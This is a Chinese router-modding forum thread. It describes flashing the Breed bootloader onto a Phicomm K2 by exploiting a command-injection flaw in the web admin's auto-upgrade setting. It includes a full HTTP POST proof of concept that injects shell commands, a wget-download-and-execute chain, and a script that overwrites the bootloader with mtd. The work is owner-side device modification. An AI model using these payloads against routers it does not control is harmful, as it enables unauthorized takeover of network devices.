斐讯K2 v22.6.534.263 直接刷固件！【附工具】 免拆机ttl

颜***

2023.02.15 上工具
适用【v22.6.534.263】【v22.6.529.216】等，更多大家自己试。
我只测试了这两个比较高的版本，我手头现有的两台K2（硬件A2）均OK。


之前一致没找到现成的工具可用，昨晚发帖后经网友提示，找到了tianhaoba大佬之前写的工具。
直接用无法成功，所以今天根据原理做了修改，感谢前人大佬耕耘，小小修改送给大家。


原工具支持：
   K1： V22.4.2.15
   K1S：V22.3.1.5
   K2： V22.2.15.128  V22.3.15.232  V22.3.17.148
            V22.4.2.8     V22.4.2.9
            V22.4.5.39    V22.4.5.42
            V22.4.6.3
            V22.5.7.118   V22.5.9.163 V22.5.10.530 V22.5.10.552 V22.5.11.5
            V22.6.503.31 V22.6.506.28 V22.6.507.43 V22.6.510.57 V22.6.511.69 V22.6.512.75 V22.6.518.161
   K2P：V22.8.5.189
大家测测看吧，期待您的反馈。



下面是原帖原理说明等内容，不想看的可以忽略。
------------------------------------------------------------------------------
各位恩山的朋友，大家好！
本人今天之前从未接触过路由器刷机，家里的K2用了很多年了。
今天是由于实在苦恼v22.6.534.263版本的广告，经常劫持，弹出一些不明觉厉很黄很暴力的页面。
所以趁今天家里人都出门了，打算好好研究一下，给它办了！

由于之前没关注过，今天有幸看到恩山论坛，以及网上各路视频、文字等教程，
总算对路由器刷机有了一定的了解，但不幸的是，我的是最新版本，没有现成的教程和工具可用，

所以在了解了原理后，自行手动，从下午一直研究到现在，没错搞到23:30多，终于直刷成功！
看到有很多朋友受此版本困扰，所以特地注册发帖把将方法分享出来！
如果有大神看到，可以直接集成进工具，原理和前几版本都一样！
废话结束------------------------------------------------------

路由器型号：K2
硬件版本：A2
软件版本：22.6.534.263

我看到的刷机工具都是利用路由器web管理系统漏洞，在路由器上执行shell命令，进行开启telnet、ssh等，然后用命令执行操作的。
v22.6.534.263版本一样有命令执行漏洞，详细见CVE漏洞公告【CVE-2022-48070】

漏洞位置：“自动升级”--》“升级时间”处


证明有效的POC：


完整数据包：

1. POST http://192.168.2.1/cgi-bin/luci/;stok=73fbbfe80fb9f7d9d881a576b0d56122/admin/more_sysset/autoupgrade/save HTTP/1.1
   
2. Host: 192.168.2.1
   
3. Connection: keep-alive
   
4. Content-Length: 25
   
5. Cache-Control: max-age=0
   
6. Upgrade-Insecure-Requests: 1
   
7. Origin: http://192.168.2.1
   
8. Content-Type: application/x-www-form-urlencoded
   
9. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
   
10. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    
11. Referer: http://192.168.2.1/cgi-bin/luci/;stok=38a2772da5876e02bb05b34e1dc8d1dc/admin/more_sysset/autoupgrade/
    
12. Accept-Encoding: gzip, deflate
    
13. Accept-Language: zh-CN,zh;q=0.9
    
14. Cookie: sysauth=417a4f67659bacbd2b8defdec94822c8
    
15. 
    
16. mode=1&autoUpTime=00%3A00%3A05%7Cid%20

复制代码

验证成功后，开了telnet、ssh，但是我觉得没啥用，直接在web执行命令就能刷入breed了。
执行的命令如下：
wget http://本地服务器IP/breed.sh -O /tmp/breed.sh;chmod 755 /tmp/breed.sh;/tmp/breed.sh
所以完整POST包为：

1. mode=1&autoUpTime=00%3A00%3A05%7Cid%20%3Bwget%20http%3A%2F%2F%E6%9C%AC%E5%9C%B0%E6%9C%8D%E5%8A%A1%E5%99%A8IP%2Fbreed.sh%20-O%20%2Ftmp%2Fbreed.sh%3Bchmod%20755%20%2Ftmp%2Fbreed.sh%3B%2Ftmp%2Fbreed.sh

复制代码

breed.sh内容如下：（脚本breed.sh和固件breed-mt7620-phicomm-psg1208.bin两个文件会放在附件，注意如果更换固件文件，则这个sh脚本中的文件md5值要改）

1. wget -T 10 http://本地服务器IP/breed-mt7620-phicomm-psg1208.bin -O /tmp/breed.bin
   
2. 
   
3. #判断是否有下载文件
   
4. if [ -f "/tmp/breed.bin" ] ;then
   
5. vmd5=`md5sum /tmp/breed.bin|cut -d ' ' -f1 `
   
6. #判断下载文件的MD5值是否正确
   
7. if [ "$vmd5" = "06763991cf7f1768659e09401f966318" ] ;then
   
8.   #如果正确则开始刷写breed
   
9.   mtd unlock Bootloader
   
10.   mtd -r write /tmp/breed.bin Bootloader
    
11. fi
    
12. fi

复制代码

等待重启完毕，因为只是刷入了breed，所以正常启动的固件还是v22.6.534.263，一切正常后，
然后拔掉电源，按住reset键，插入电源，等待5秒松手，打开192.168.1.1看到了breed web。
然后刷入了网友推荐的第三方固件，试用几天看看还有没有广告。。。


因为从没搞过刷机，不知道方法对不对，还能不能在其他人那复现。写的不对的地方还请海涵！
总体思路和验证代码我尽量详细的给出了，我也不会做工具，感觉挺麻烦的。
还请大神或之前刷机软件的开发大神们集成进工具。
今天太晚了，后面我看看有没有现成的软件能方便的完成这些操作，再来跟大家分享。

zha***

牛逼，谢谢分享

八米***

这个厉害，时隔多年，居然出了免拆刷法。。虽然看不懂。。。。。

wuli***

这个厉害了，收藏备用  改天抽空仔细看看

aiy***

果然是高手，一点就通

chq***

我14号搞了一天没有刷机成功，麻烦问一下楼主，这伙人需要用到脚本吗？

chq***

能详细说说那些开发者工具怎么使用的吗？

蔡***

有没有大佬弄个工具啊

入***

免拆确实厉害了

lid***

高手，感谢分享。

叶***

我是把闪存拆下来编程器刷不死鸟然后再焊上去，最后刷老毛子固件

fw***

整个情人节都在捣鼓刷机啦，为你的奉献精神点赞

mo***

矿佬 发表于 2023-2-15 01:36
这个厉害，时隔多年，居然出了免拆刷法。。虽然看不懂。。。。。

早就免拆，我上一年就是免拆刷了bread，只是K2百兆网口性能有限，无奈放弃

mo***

我是用工具刷的bread，你这个用命令去操作显得更有技术，

ikbsz***

这个漏洞应该早就利用了，你可以试着改一下旧的刷机脚本

下载刷机.zip解压，右键刷机.bat，记事本编辑查找替换，把autoUpTime=03%%3A03 替换成autoUpTime=03%%3A03%%3A03没测试

https://www.right.com.cn/forum/thread-209423-1-1.html